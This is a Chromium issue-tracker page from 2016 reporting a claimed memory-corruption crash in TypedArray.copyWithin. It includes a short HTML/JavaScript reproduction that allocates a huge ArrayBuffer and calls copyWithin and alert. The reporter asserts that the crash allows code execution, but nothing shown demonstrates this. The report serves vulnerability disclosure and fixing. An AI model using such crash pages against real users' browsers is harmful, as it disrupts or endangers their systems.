Issue metadata
Sign in to add a comment
|
Security: TypedArray.copyWithin alert memory corruption.
Reported by
pabster...@gmail.com,
Oct 13 2016
|
||||||||||||||||||
Issue description
VULNERABILITY DETAILS
By doing creating a typed array by allocating an arraybuffer with a length of 2147479551 and then creating a variable be the typedarray.copywithin(random all here) and then doing alert() on the resulting variable will trigger a memory corruption vulnerability that will crash the chrome helper for that tab, allowing an attacker to take control of the process and execute code in the machine as that process.
VERSION
Chrome Version: 53.0.2785.143
Operating System: Mac OS X 10.11.6
REPRODUCTION CASE
This html will crash chrome helper process for that tab:
<html>
<body>
<script>
var q = new ArrayBuffer(2147479551);
var o = {valueOf : !true}
var a = new Uint8Array(q);
var d = a.copyWithin(true, a, true);
alert(d)
</script>
</body>
</html>
FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: tab
Client ID (if relevant): [see link above]
Crash ID 8605fccb-3806-4ccc-9479-aaa5d853cfa8
,
Oct 13 2016
ClusterFuzz is analyzing your testcase. Developers can follow the progress at https://cluster-fuzz.appspot.com/testcase?key=5735434430971904
,
Oct 13 2016
,
Jan 19 2017
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by ClusterFuzz
, Oct 13 2016